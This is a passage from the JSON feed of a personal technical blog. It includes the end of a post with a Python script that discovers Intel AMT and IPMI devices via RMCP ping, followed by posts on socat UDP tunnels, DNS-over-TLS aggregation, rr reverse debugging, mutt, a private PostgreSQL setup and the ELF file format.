(struct.calcsize(ASF_RMCP_PONG_FORMAT), len(payload)))\n        (self.entreprise_number, self.oem_defined, self.supported_entities,\n         self.supported_interactions, self.reserved1,\n         self.reserved2, self.reserved3, self.reserved4, self.reserved5,\n         self.reserved6) = struct.unpack_from(ASF_RMCP_PONG_FORMAT, payload)\n\n    def ipmi(self):\n        return (self.supported_entities & 127) != 0\n\n    def asf(self):\n        return (self.supported_entities & 15) == 1\n\n    def dash(self):\n        return (self.supported_interactions & 32) != 0\n\n    def features(self):\n        res = []\n        if self.ipmi():\n            res.append(\"ipmi\")\n        if self.asf():\n            res.append(\"asf\")\n        if self.dash():\n            res.append(\"dash\")\n        return res\n\nm = Message()\nm.message_class = ASF_RMCP_VERSION1\nm.message_type = ASF_RMCP_MESSAGE_TYPE_PRESENCE_PING\n\nsock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\nsock.sendto(m.to_bytes(), (address, ASF_RMCP_PORT))\nsock.settimeout(1)\n\nlogging.info(\"Listening\")\ntry:\n    while True:\n        data, addr = sock.recvfrom(1024)\n        logging.debug(\"From \" + str(addr[0]) + \": \" + str(data))\n        if len(data) == 4 and data[0] == ASF_RMCP_VERSION1 and data[2] == 0 \\\n                and data[3] == ASF_RMCP_MESSAGE_TYPE_PRESENCE_PING_ACK:\n            logging.debug(\"Ack from \" + str(addr[0]))\n            continue\n        try:\n            m.load(data)\n        except:\n            continue\n        if m.message_type == ASF_RMCP_MESSAGE_TYPE_PRESENCE_PONG:\n            # Pong:\n            print(str(addr[0]))\n            pongData = PongData(m.data)\n            features = pongData.features()\n            print(\"\\tEntreprise: %s\" %\n                  entreprise_name(pongData.entreprise_number))\n            if len(features) != 0:\n                print(\"\\tFeatures: %s\" % \",\".join(features))\nexcept socket.timeout:\n    pass\n
\n\n\n

Results

\n

We can discover devices on the local network by using its broadcast address:

\n
\n$ ./rmcp-discover 192.0.2.255\n::ffff:192.0.2.56\n    Entreprise: Intel\n    Features: dash\n::ffff:152.81.7.32\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.228\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.230\n    Entreprise: Intel\n    Features: dash\n::ffff:152.81.3.90\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.170\n    Entreprise: Intel\n    Features: dash\n::ffff:152.81.8.105\n    Entreprise: Intel\n    Features: dash\n::ffff:152.81.5.123\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.235\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.29\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.233\n    Entreprise: Intel\n    Features: dash\n::ffff:192.0.2.171\n    Entreprise: Intel\n    Features: dash\n
\n\n

They advertise Intel and DASH: those are probably AMT devices.

\n

We can use the same script to discover IPMI nodes as well:

\n
\n$ ./rmcp-discover 198.51.100.42\n::ffff:198.51.100.42\n    Entreprise: Alerting Specifications Forum\n    Features: ipmi,asf\n
\n\n

We cannot (reliably) use this to detect AMT on the local machine. The reason is\nthat the messages are sent to the ME when they arrive on the hardware Ethernet\nadapter. Messages emitted by the localhost to its own IP address\nare handled internally by the OS: they are received by the Ethernet adapter\nand thus do not reach the ME.\nIn order to communicate to its own ME, the OS needs to communicate using the MEI\ninstead of using IP. The Intel LMS can be installed to reach the local ME over\nIP: AFAIU, it listens on the suitable TCP and UDP ports and forwards the request\nto the ME using the MEI.

\n

References

\n

Technical documentation

\n\n

Documentation

\n\n

Articles

\n\n

CVE-2017-5689

\n

Interesting references following the\nINTEL-SA-00075/CVE-2017-5689\nvulerability:

\n"}, {"id": "http://www.gabriel.urdhr.fr/2016/03/25/cloc-with-flamegraph/", "title": "Number of lines of code with FlameGraph", "url": "https://www.gabriel.urdhr.fr/2016/03/25/cloc-with-flamegraph/", "date_published": "2016-03-25T00:00:00+01:00", "date_modified": "2016-03-25T00:00:00+01:00", "tags": ["computer", "simgrid"], "content_html": "

FlameGraph\nis used to display stack trace samples but we can ue it for\nother purposes as well.

\n

For example, we can quite simply display where are the lines of code\nof a project:

\n
cloc --csv-delimiter=\"$(printf '\\t')\" --by-file --quiet --csv src/ include/ |\nsed '1,2d' |\ncut -f 2,5 |\nsed 's/\\//;/g' |\n./flamegraph.pl\n
\n\n\n
\n\n \"\"\n\n
Number of lines of code in SimGrid
\n
\n\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2016/01/12/ip-over-udp-with-socat/", "title": "IP over UDP tunnel with socat", "url": "https://www.gabriel.urdhr.fr/2016/01/12/ip-over-udp-with-socat/", "date_published": "2016-01-12T00:00:00+01:00", "date_modified": "2016-01-12T00:00:00+01:00", "tags": ["computer", "network", "vpn", "encapsulation", "tun"], "content_html": "

A simple way to create IP over\nUDP tunnels using\nsocat.

\n

This is the protocol stack we're going to implement:

\n
\n[ IP  ]\n[ UDP ]\n[ IP  ]\n
\n\n

In order to create a tunnel, we must create a\nTUN\ndevice interface. A TUN device is a network device managed by a\nuserspace program:

\n\n

We'd like to have a simple program which manages such a TUN device by\nencapsulating them over a UDP socket.

\n

Using socat

\n

It turns out socat can do this already!

\n

On the first host:

\n
sudo socat UDP:192.0.2.2:9000,bind=192.0.2.1:9000 \\\n  TUN:10.0.1.1/24,tun-name=tundudp,iff-no-pi,tun-type=tun,su=$USER,iff-up\n
\n\n\n

On the second one:

\n
sudo socat UDP:192.0.2.1:9000,bind=192.0.2.2:9000 \\\n  TUN:10.0.1.2/24,tun-name=tundudp,iff-no-pi,tun-type=tun,su=$USER,iff-up\n
\n\n\n

Explanations:

\n\n

Now we can ping over the tunnel:

\n
host1:~$ ping 10.0.1.2\nPING 10.0.1.2 (10.0.1.2) 56(84) bytes of data.\n64 bytes from 10.0.1.2: icmp_seq=1 ttl=64 time=39.3 ms\n64 bytes from 10.0.1.2: icmp_seq=2 ttl=64 time=40.1 ms\n\nhost1:~$ ip route get 10.0.1.2\n10.0.1.2 dev tunudp  src 10.0.1.1 \n    cache\n
\n\n\n

You can add IPv6 addresses to the tunnel and it works as expected:\nboth IPv4 and IPv6 packets are sent over the same UDP socket and the\nversion field is used to distinguish them.

\n

Using ip fou

\n

The other solution is to use ip fou (for\nfoo over UDP):

\n
modprobe fou\nip fou add port 9000 ipproto 4\nip link add name tunudp type ipip \\\n       remote 192.168.2.2 local 192.168.2.1 ttl 225 \\\n       encap fou \\\n       encap-sport auto encap-dport 9000\n
\n\n\n

We can expect better performance as its handled completely in the\nkernel side. The downside is that you have to create two different\ntunnels (one for encapsulating IPv4 and the other for IPv6).

"}, {"id": "http://www.gabriel.urdhr.fr/2015/12/09/dns-aggregator-tls/", "title": "DNS aggregation over TLS", "url": "https://www.gabriel.urdhr.fr/2015/12/09/dns-aggregator-tls/", "date_published": "2015-12-09T00:00:00+01:00", "date_modified": "2015-12-09T00:00:00+01:00", "tags": ["computer", "dns", "network", "internet", "tls"], "content_html": "

In a previous\npost, I tried\ndifferent solutions for tunnelling DNS over\nTLS. One of those solutions was\nusing a dedicated DNS-over-UDP fake\nservice replying to all\nqueries with the truncate flag set: this was causing the stub\nresolvers to retry the query using a TCP-based virtual-circuit. This\nsolution is interesting because it is dead simple (it fits in a few\nline of codes) but it is clearly a hack. Here, I'm using a dedicated\nDNS forwarder aggregating all\nthe incoming DNS-over-UDP requests over a single persistent TCP\nvirtual-circuit.

\n

Update (2017-05-17):\nThis was written before DNS/TLS was a thing\n(and before it was natively implemented in resolvers).\nSee DNS Privacy\nfor up-to-date instructions.

\n

Summary

\n

The differents solutions presented in the previous post on the\nresolver side:

\n\n

The last solution is using this protocol stack:

\n
\n     DNSSEC valid.   TLS Init.\n         cache       verify TLS\n\n[DNS]<->[DNS   ]<------------------------>[DNS]\n[   ]   [      ]<---->[  |TLS]<---------->[TLS]\n[TCP]<->[TCP   ]<---->[TCP   ]<---------->[TCP]\n[IP ]<->[IP    ]<---->[IP    ]<---------->[IP ]\nStub R.  Forwarder    TLS Init. Internet   Recursive\n         (unbound)    (stunnel)\n
\n\n

However,\neach DNS request is using a new TCP\nand TLS connection\nbetween the\nstub resolver and unbound. Between unbound and stunnel, each each\nincoming TCP connection stream is encapsulated in a new TLS\nconnection. This is very inefficient and the resulting DNS service is\nnot very robust.

\n

Performance considerations for DNS over TLS are summarized in the TLS\nfor DNS: Initiation and Performance\nConsiderations\ndraft (emphasis mine):

\n
\n

Latency: Compared to UDP, DNS-over-TCP requires an additional\nround-trip-time [\u2026]. The TLS handshake adds another two RTTs of\nlatency.

\n

State: The use of connection-oriented TCP requires keeping\nadditional state in both kernels and applications. [\u2026]

\n

Processing: [\u2026] slightly higher CPU usage.

\n

Number of connections: clients SHOULD minimize creation of new\nTCP connections. Use of a local DNS request aggregator (a\nparticular type of forwarder) allows a single active DNS-over-TLS\nconnection from any given client computer to its server.

\n
\n

DNS aggregation over a persistent TCP connection

\n

In order to fix this problem, I wrote a prototype DNS\nforwarder which aggregates all\nthe local UDP-based DNS messages over a persistent TCP stream:

\n\n

This service can then be coupled with a TLS initiator (stunnel)\nwhich encapsulates the persistent DNS stream over TCP.

\n

In the future, the tool might have an option to talk TLS natively. My\nexcuse for not adding builtin support for TLS was that it gives you\nthe freedom of choosing which TLS implementation you would like to use\n(OpenSSL with stunnel or socat, GnuTLS with gnutls-serv and a\ntool such as socat with faucet, NSS but I do not know a suitable\ntool using this library, etc).

\n
\n        VC encap. DNSSEC valid.    TLS\n    Mux.        cache        TLS verify\n\n[DNS]<->[DNS    ]<->[DNS   ]<---------------------->[DNS]\n                                     [TLS]<-------->[TLS]\n[UDP]<->[UDP|TCP]<->[TCP   ]<---->[TCP   ]<-------->[TCP]\n[IP ]<->[IP     ]<->[IP    ]<---->[IP    ]<-------->[IP ]\nClient  Aggregator  Forwarder     TLS Init. Internet  Recursive\n         (dnsfwd)   (unbound)    (stunnel)\n
\n\n

The resulting DNS service is much more robust.

\n

Warning: This software is currently a prototype. Use at your\nown risk.

\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/11/25/rr-use-after-free/", "title": "Debugging use-after-free with RR reverse execution", "url": "https://www.gabriel.urdhr.fr/2015/11/25/rr-use-after-free/", "date_published": "2015-11-25T00:00:00+01:00", "date_modified": "2015-11-25T00:00:00+01:00", "tags": ["computer", "debug", "gdb", "rr", "simgrid"], "content_html": "

RR is a very useful tool for debugging. It\ncan record the execution of a program and then replay the exact same\nexecution at will inside a debugger. One very useful extra power\navailable since 4.0 is the support for efficient reverse\nexecution\nwhich can be used to find the root cause of a bug in your program\nby rewinding time. In this example, we reverse-execute a program from a\ncase of use-after-free in order to find where the block of memory was\nfreed.

\n

TLDR

\n
\n$ rr record ./foo my_args\n$ rr replay\n(rr) continue\n(rr) break free if $rdi == some_address\n(rr) reverse-continue\n
\n\n

Problem

\n

We have a case of use-after-free:

\n
$ gdb --args java -classpath \"$classpath\" surfCpuModel/TestCpuModel \\\n  small_platform.xml surfCpuModelDeployment.xml \\\n  --cfg=host/model:compound\n\n(gdb) run\n[\u2026]\n\nProgram received signal SIGSEGV, Segmentation fault.\n[Switching to Thread 0x7ffff7fbb700 (LWP 12766)]\n0x00007fffe4fe3fb7 in xbt_dynar_map (dynar=0x7ffff0276ea0, op=0x56295a443b6c65) at /home/gabriel/simgrid/src/xbt/dynar.c:603\n603     op(elm);\n\n(gdb) p *dynar\n$2 = {size = 2949444837771837443, used = 3415824664728436765,\n      elmsize = 3414970357536090483, data = 0x646f4d2f66727573,\n      free_f = 0x56295a443b6c65}\n
\n\n

The fields of this structure are all wrong and we suspect than this\nblock of heap was already freed and reused by another allocation.

\n

We could use GDB with a conditional breakpoint of free(ptr) with\nptr == dynar but this approach poses a few problems:

\n
    \n
  1. \n

    in the new execution of the program this address might be\n completely different because of different source of indeterminism\n such as,

    \n
  2. \n
  3. \n

    ASLR which we could disable with setarch -R,

    \n
  4. \n
  5. \n

    scheduling of the different threads (and Java usually spawns quite\n a few threads);

    \n
  6. \n
  7. \n

    there could be a lot of calls of free() for this specific\n address for previous allocations before we reach the correct one.

    \n
  8. \n
\n

Using RR

\n

Deterministic recording

\n

RR can be used to create a recording of a given execution of the\nprogram. This execution can then be replayed exactly inside a\ndebugger. This fixes our first problem.

\n

Let's record our crash in RR:

\n
$ rr record java -classpath \"$classpath\" surfCpuModel/TestCpuModel \\\n  small_platform.xml surfCpuModelDeployment.xml \\\n    --cfg=host/model:compound\n[\u2026]\n# A fatal error has been detected by the Java Runtime Environment:\n[\u2026]\n
\n\n

Now we can replay the exact same execution over and over gain in a special\nGDB session:

\n
$ rr replay\n(rr) continue\nContinuing.\n[\u2026]\n\nProgram received signal SIGSEGV, Segmentation fault.\n[Switching to Thread 12601.12602]\n0x00007fe94761efb7 in xbt_dynar_map (dynar=0x7fe96c24f350, op=0x56295a443b6c65) at /home/gabriel/simgrid/src/xbt/dynar.c:603\n603     op(elm);\n
\n\n

Reverse execution to the root cause of the problem

\n

We want to know who freed this block of memory. RR 4.0 provides\nsupport for efficient reverse-execution which can be used to solve our\nsecond problem.

\n

Let's set a conditional breakpoint on free():

\n
(rr) p dynar\n$1 = (const xbt_dynar_t) 0x7fe96c24f350\n\n(rr) break free if $rdi == 0x7fe96c24f350\n
\n\n

Note: This is for x86_64.\nIn the x86_64 ABI,\nthe RDI register is used to pass the first parameter.

\n

Now we can use RR super powers by reverse-executing the program until\nwe find who freed this block of memory:

\n
\n(rr) reverse-continue\nContinuing.\nProgram received signal SIGSEGV, Segmentation fault.\n[\u2026]\n\n(rr) reverse-continue\nContinuing.\nBreakpoint 1, __GI___libc_free (mem=0x7fe96c24f350) at malloc.c:2917\n2917    malloc.c: Aucun fichier ou dossier de ce type.\n\n(bt) backtrace\n#0  __GI___libc_free (mem=0x7fe96c24f350) at malloc.c:2917\n#1  0x00007fe96b18486d in ZIP_FreeEntry (jz=0x7fe96c0f43d0, ze=0x7fe96c24f6e0) at ../../../src/share/native/java/util/zip/zip_util.c:1104\n#2  0x00007fe968191d78 in ?? ()\n#3  0x00007fe96818dcbb in ?? ()\n#4  0x0000000000000002 in ?? ()\n#5  0x00007fe96c24f6e0 in ?? ()\n#6  0x000000077ab0c2d8 in ?? ()\n#7  0x00007fe970641a80 in ?? ()\n#8  0x0000000000000000 in ?? ()\n\n(rr) reverse-continue\nContinuing.\nBreakpoint 1, __GI___libc_free (mem=0x7fe96c24f350) at malloc.c:2917\n2917    in malloc.c\n\n(rr) backtrace\n#0  __GI___libc_free (mem=0x7fe96c24f350) at malloc.c:2917\n#1  0x00007fe94761f28e in xbt_dynar_to_array (dynar=0x7fe96c24f350) at /home/gabriel/simgrid/src/xbt/dynar.c:691\n#2  0x00007fe946b98a2f in SwigDirector_CpuModel::createCpu (this=0x7fe96c14d850, name=0x7fe96c156862 \"Tremblay\", power_peak=0x7fe96c24f350, pstate=0, \n    power_scale=1, power_trace=0x0, core=1, state_initial=SURF_RESOURCE_ON, state_trace=0x0, cpu_properties=0x0)\n    at /home/gabriel/simgrid/src/bindings/java/org/simgrid/surf/surfJAVA_wrap.cxx:1571\n#3  0x00007fe947531615 in cpu_parse_init (host=0x7fe9706456d0) at /home/gabriel/simgrid/src/surf/cpu_interface.cpp:44\n#4  0x00007fe947593f88 in sg_platf_new_host (h=0x7fe9706456d0) at /home/gabriel/simgrid/src/surf/sg_platf.c:138\n#5  0x00007fe9475e54fb in ETag_surfxml_host () at /home/gabriel/simgrid/src/surf/surfxml_parse.c:481\n#6  0x00007fe9475da1dc in surf_parse_lex () at src/surf/simgrid_dtd.c:7093\n#7  0x00007fe9475e84f2 in _surf_parse () at /home/gabriel/simgrid/src/surf/surfxml_parse.c:1068\n#8  0x00007fe9475e8cfa in parse_platform_file (file=0x7fe96c14f1e0 \"/home/gabriel/simgrid/examples/java/../platforms/small_platform.xml\")\n    at /home/gabriel/simgrid/src/surf/surfxml_parseplatf.c:172\n#9  0x00007fe9475142f4 in SIMIX_create_environment (file=0x7fe96c14f1e0 \"/home/gabriel/simgrid/examples/java/../platforms/small_platform.xml\")\n    at /home/gabriel/simgrid/src/simix/smx_environment.c:39\n#10 0x00007fe9474cd98f in MSG_create_environment (file=0x7fe96c14f1e0 \"/home/gabriel/simgrid/examples/java/../platforms/small_platform.xml\")\n    at /home/gabriel/simgrid/src/msg/msg_environment.c:37\n#11 0x00007fe94686c473 in Java_org_simgrid_msg_Msg_createEnvironment (env=0x7fe96c00a1d8, cls=0x7fe9706459a8, jplatformFile=0x7fe9706459b8)\n    at /home/gabriel/simgrid/src/bindings/java/jmsg.c:203\n#12 0x00007fe968191d78 in ?? ()\n#13 0x00000007fffffffe in ?? ()\n#14 0x00007fe970645958 in ?? ()\n#15 0x00000007f5cd1100 in ?? ()\n#16 0x00007fe9706459b8 in ?? ()\n#17 0x00000007f5cd1738 in ?? ()\n#18 0x0000000000000000 in ?? ()\n
\n\n

Now that we have found the offending free() call we can inspect the state\nof the program:

\n
\n(rr) frame 1\n#1  0x00007fe94761f28e in xbt_dynar_to_array (dynar=0x7fe96c24f350) at /home/gabriel/simgrid/src/xbt/dynar.c:691\n691   free(dynar);\n\n(rr) list\n686 {\n687   void *res;\n688   xbt_dynar_shrink(dynar, 1);\n689   memset(xbt_dynar_push_ptr(dynar), 0, dynar->elmsize);\n690   res = dynar->data;\n691   free(dynar);\n692   return res;\n693 }\n694\n695 /** @brief Compare two dynars\n
\n\n

If necessary we could continue reverse-executing in order to understand\nbetter what caused the problem.

\n

Using GDB

\n

While GDB has builtin support for reverse\nexecution,\ndoing the same thing in GDB is much slower. Moreover, recording\nthe execution fills the GDB record buffer quite rapidly which prevents\nus from recording a large execution: with the native support of GDB\nwe would probably need to narrow down the region when the bug appeared\nin order to only record (and the reverse-execute) a small part of the\nexecution of the program.

\n

References

\n"}, {"id": "http://www.gabriel.urdhr.fr/2015/10/12/mutt-multiaccount/", "title": "Multiple accounts with mutt", "url": "https://www.gabriel.urdhr.fr/2015/10/12/mutt-multiaccount/", "date_published": "2015-10-12T00:00:00+02:00", "date_modified": "2015-10-12T00:00:00+02:00", "tags": ["computer", "mutt", "mail"], "content_html": "

If you try to use mutt, you will wonder how you're supposed to handle\nmultiple\naccounts.\nYou will find suggestions to bind some keys to switch to different\naccounts, use hooks.

\n

My current solution is much simpler: create a configuration file for\neach account and do not try to handle different accounts in the same\nprocess. I have multiple configuration files (one for each account).\nThey are named mutt-foo and are in my PATH (in ~/.bin) with the\nexecutable bit:

\n
#!/usr/bin/mutt -F\n\n# ##### Basic config:\n\nset realname = \"John Doe\"\nset from = \"john.doe@example.com\"\n\n# Sane configuration:\nset send_charset=\"utf-8\"\nset ssl_force_tls = yes\n\nset smtp_url  = \"smtp://jdoe@smtp.example.com/\"\n\nset imap_user = \"jdoe\"\nset folder = \"imaps://imap.example.com\"\nset spoolfile = \"=INBOX\"\nset record = \"=INBOX\"\nset postponed = \"=Drafts\"\nset trash = \"=Trash\"\n\nset header_cache = \"~/.mutt/cache/example/\"\n\n# ###### UI\n\nset edit_headers = yes\n
\n\n\n

I can call one of the mutt-foo scripts in order to connect to a\ngiven account.

\n

The default configuration ~/.mutt/muttrc is a symlink to one of\nthose and is used when mutt is called directly.

"}, {"id": "http://www.gabriel.urdhr.fr/2015/09/29/private-postgresql/", "title": "Private PostgreSQL instance", "url": "https://www.gabriel.urdhr.fr/2015/09/29/private-postgresql/", "date_published": "2015-09-29T00:00:00+02:00", "date_modified": "2015-09-29T00:00:00+02:00", "tags": ["computer", "sql"], "content_html": "

How to create a private on-demand PostgreSQL instance accessible only\nfor the local user over UNIX socket.

\n

Setup

\n

Create the database

\n

Let's create directory for our database:

\n
mkdir ~/mydb\ncd ~/mydb\n
\n\n\n

We'll use some environment variables:

\n\n
PATH=\"/usr/lib/postgresql/9.4/bin:$PATH\"\nPGDATA=\"$(pwd)\" ; export PGDATA # for initdb, postgresql, pg_ctl\nPGHOST=\"$(pwd)\" ; export PGHOST # for psql\n
\n\n\n

We can now create the PostgreSQL database:

\n
initdb\n
\n\n\n

Paranoid UNIX socket configuration

\n

Only allow the current user to connect with UNIX socket (and disable IP\nsockets):

\n
cat >> postgresql.conf <<EOF\n# Get off my lawn:\nlisten_addresses = ''\nunix_socket_directories = '.'\nunix_socket_permissions = 0700\nEOF\n
\n\n\n

On Linux, the unix_socket_permissions prevents any other local user to connect\nto the socket. On other *nix system, this does not work.

\n

Let's reject any connection from other users (in pg_hba.conf):

\n
echo \"local   all    $USER    ident\" > pg_hba.conf\n
\n\n\n

Usage

\n

Start the database server:

\n
pg_ctl start\n
\n\n\n

For convenience, let's create a $USER database (because default psql\nconnects to the $USER database with the $USER login):

\n
psql postgres <<EOF\ncreate database $USER;\nEOF\n
\n\n\n

Now we can connect to this database with:

\n
psql\n
\n\n\n

Stop the database server:

\n
pg_ctl stop\n
\n\n\n

IP socket support

\n

Many services can only connect over IP. If this is needed, we have\nto relax the security of the service and allow connections over IP:

\n

Let's listen on the loopback device:

\n
listen_addresses = 'localhost'\n
\n\n\n

Allow connection using the loopback device:

\n
cat << EOF >> pg_hba.conf\nhostnossl   all    $USER  127.0.0.1/32  md5\nhostnossl   all    $USER  ::1/128       md5\nEOF\n
\n\n\n

Set a password for the user:

\n
alter user foo with password 'secret'\n
\n\n\n

Another solution is to use a local ident server with the ident method.\nThis should be safe for the loopback interface if the configuration of the\nident server is suitable.

\n

Bonus: CSV import

\n

With SQL syntax (using the server filesystem and working directory):

\n
create table if not exists test(int a, int b);\ndelete from test;\ncopy test from 'test.csv' with csv header;\n
\n\n\n

STDIN or PROGRAM 'cat test.csv' can be used as well.

\n

With psql commands (using the client filesystem and working\ndirectory):

\n
\\copy test from 'test.csv' csv header\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/09/28/elf-file-format/", "title": "The ELF file format", "url": "https://www.gabriel.urdhr.fr/2015/09/28/elf-file-format/", "date_published": "2015-09-28T00:00:00+02:00", "date_modified": "2015-09-28T00:00:00+02:00", "tags": ["computer", "system", "elf", "linking", "dwarf"], "content_html": "

Some notes on the ELF file format with references, explanations and\nsome examples.

\n

The ELF file format is a standard file format for executable files,\ndynamic libraries27 (DSOs, .so files), compiled\ncompilation unit (.o files) and core dumps. It is used for many\nplatforms6 including many recent Unix-ish systems (System V,\nGNU, BSD) and embedded software5.

\n

You might want to read this document alongside with the outputs of\nreadelf, objdump -D2, objcopy --dump-section,\nelfcat7 and/or an\nhexadecimal editor. You might want to cross-reference with elf.h,\nthe manpage (man 5 elf) or the ELF\nspecs.

\n

Basic structure

\n

The ELF header is located at the beginning of the\nELF file and contains information about the target OS, architecture,\nthe type of ELF file (executable, dynamic library, etc.) and the\nlocation of two important structures within the ELF file defining two\nviews of the ELF file:

\n\n

Execution view

\n

The execution view is given by the program header\ntable. This table is used (by the kernel,\nby the dynamic linker, etc.) to create a runtime image of the program\nin memory:

\n\n

Linking view

\n

The linking view is given by the section header\ntable which describes the location of the\ndifferent sections (within the file and within the the runtime\nimage of the program).

\n

The .o files generated by the compiler are made of different\nsections (.text for executable code, .data for initialised global\nvariables, .rss for uninitialised global variables, .rodata for\nread-only global variables, etc.): the link editor combines different\n.o files in a single executable or DSO (by merging the sections of\nthe different .o files with the same name) and generates some others\n(.got, .dynamic, .plt, .got.plt, etc.)12.

\n

The linking view is not used at runtime: all the information needed at\nruntime is in the the program header table. Some sections are not\nused at runtime (debugging information, full symbol table) and are not\npresent in the execution view. Those sections and the section header\ntable can be omitted (or stripped) from the ELF file.

\n

If they are present those extra informations can be used by debugging\ntools (such as GDB), profiling tools, etc. Many tools for inspection\nand manipulation of ELF files (readelf, objdump) rely on the\nsection table header to work correctly.

\n

Other important structures

\n

The dynamic section contains important\ninformations used for dynamic linking.

\n

Symbol tables list the symbols defined and\nused by the file.

\n

Hash tables are used for efficient lookup of\nsymbols by their name (symbol table entries by symbol name).

\n

Relocation tables list the relocations\nneeded to relocate the ELF file at a different memory address or to\nlink it to other ELF objects;

\n

String tables are lists of strings which are\nreferenced at other places in the ELF file (for section names in the\nsection header table, for symbol names on the symbol tables, etc.);

\n

The GOT is a table filled by the dynamic linker with\naddresses of functions and variables. The program uses those entries\nto get the address of variables or functions which could be located in\nanother ELF module.

\n

The PLT contains trampolines: they are stubs for functions\nwhich might be located in another ELF module. The program calls those\nstubs which calls the real function (by dereferencing a corresponding\nGOT entry). This is used for lazy relocation.

\n

Notes are used to add miscellaneous informations (such\nas GNU ABI informations, GNU build IDs).

\n

ELF header

\n

The ELF header is at the beginning of the ELF file and contains:

\n\n

The ELF header is using the following structure4:

\n
typedef struct {\n  unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */\n  Elf64_Half    e_type;             /* Object file type */\n  Elf64_Half    e_machine;          /* Architecture */\n  Elf64_Word    e_version;          /* Object file version */\n  Elf64_Addr    e_entry;            /* Entry point virtual address */\n  Elf64_Off     e_phoff;            /* Program header table file offset */\n  Elf64_Off     e_shoff;            /* Section header table file offset */\n  Elf64_Word    e_flags;            /* Processor-specific flags */\n  Elf64_Half    e_ehsize;           /* ELF header size in bytes */\n  Elf64_Half    e_phentsize;        /* Program header table entry size */\n  Elf64_Half    e_phnum;            /* Program header table entry count */\n  Elf64_Half    e_shentsize;        /* Section header table entry size */\n  Elf64_Half    e_shnum;            /* Section header table entry count */\n  Elf64_Half    e_shstrndx;         /* Section header string table index */\n} Elf64_Ehdr;\n
\n\n\n

readelf -h can display the content of the ELF header.

\n

ELF class

\n

The e_ident[EI_CLASS] field describes the ELF class: 32-bit\n(ELFCLASS32) or 64-bit (ELFCLASS64) for 32-bit and 64-bit programs\nrespectively.

\n

The ELF structures are different for the two ELF classes: the fields\nare the same but their type and sometimes their order is different (in\norder to have packed structures). For example, the -ELF header is\nusing the Elf32_Ehdr and Elf64_Ehdr structures for -ELFCLASS32\nand ELFCLASS64 respectively.

\n

ELF endianess

\n

The e_ident[EI_DATA] field describes the encoding (endianess) of the\narchitecture (either ELFDATA2LSB or ELFDATA2MSB). The fields of\nthe ELF file are encoded in the encoding/endianess of the\narchitecture: you might have to swap the endianess (see endian.h) if\nyou process ELF files from a foreign architecture.

\n

ELF type

\n

The ELF type is in the e_type field:

\n\n

A major difference between ET_EXEC and ET_DYN files is that\nET_DYN files are always fixed at a given position in the virtual\naddress. In contrast, ET_DYN files can be relocated anywhere in the\nvirtual address space by applying a constant offset to its virtual\naddresses10: the same .so file can be mapped at different\nlocations in different processes9. Usually, the\nshared-object is mapped at address 0 in the ELF file29.

\n

Normal (ET_EXEC) executables are always mapped at a given location\nso the location of their subprograms and global variables is always\nthe same for each process. This knowledge can be exploited by an\nattacker to get control of the process. In order to avoid this, the\nprogram can be compiled as a\nPIE11\nwhich can be mapped (relocated) at any address in the process virtual\naddress space. PIEs being relocatable are ET_DYN instead of\nET_EXEC file.

\n

The Linux kernel (vmlinux) uses the ET_EXEC type and its loadable\nmodules (.ko files) use the ET_REL type.

\n

Location of the header tables

\n

The location of the section header table and program header table are\ndescribed in the ELF header:

\n\n

Section header table

\n

The section header table defines the linking view of the ELF file:\neach entry defines a section within the file. The compiler generates\nrelocatable object (.o files) made of different sections (.text,\n.data, .rodata, .rss, etc.). When the link editor ld combines\ndifferent relocatable objects into an executable or shared-object, it\nmerges the sections with the same name in a single section in the\nfinal output. For example, it combines the .text sections\n(containing the compiled code) of the different .o files in a single\n.text section.

\n

The section table is an array of section descriptions with the\nstructure:

\n
typedef struct {\n  Elf64_Word    sh_name;      /* Section name (string tbl index) */\n  Elf64_Word    sh_type;      /* Section type */\n  Elf64_Xword   sh_flags;     /* Section flags */\n  Elf64_Addr    sh_addr;      /* Section virtual addr at execution */\n  Elf64_Off     sh_offset;    /* Section file offset */\n  Elf64_Xword   sh_size;      /* Section size in bytes */\n  Elf64_Word    sh_link;      /* Link to another section */\n  Elf64_Word    sh_info;      /* Additional section information */\n  Elf64_Xword   sh_addralign; /* Section alignment */\n  Elf64_Xword   sh_entsize;   /* Entry size if section holds table */\n} Elf64_Shdr;\n
\n\n\n

The first entry of a section header table is always a empty null\nsection (type SHT_NULL).

\n

readelf -S can display the section header table. readelf -x can be\nused to get a hexdump of a given ELF section. A raw dump of a section\ncan be produced with objcopy a.out --dump-section .dynstr=/dev/stdout\n/dev/null | cat. Note that, some sections are not visible to\nobjcopy and objdump: you might want to use\nelfcat7 instead.

\n

Section names

\n

Each section has a name (.text, .data, .rodata, .rss, .got,\n.plt, etc.): all section names are stored in a string table\n(.shstrtab). The e_shstrndx field of the ELF header is the index\n(in the section header table) of the section containing the section\nnames:

\n
ELF Header:\n  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00\n  Class:                             ELF64\n[...]\n  Section header string table index: 26\n\nSection Headers:\n  [Nr] Name              Type             Address           Offset\n       Size              EntSize          Flags  Link  Info  Align\n  [26] .shstrtab         STRTAB           0000000000000000  0001e220\n       00000000000000f3  0000000000000000           0     0     1\n
\n\n

The sh_name field of the section header is the byte offset of the\nsection name within this string table.

\n

Existing sections

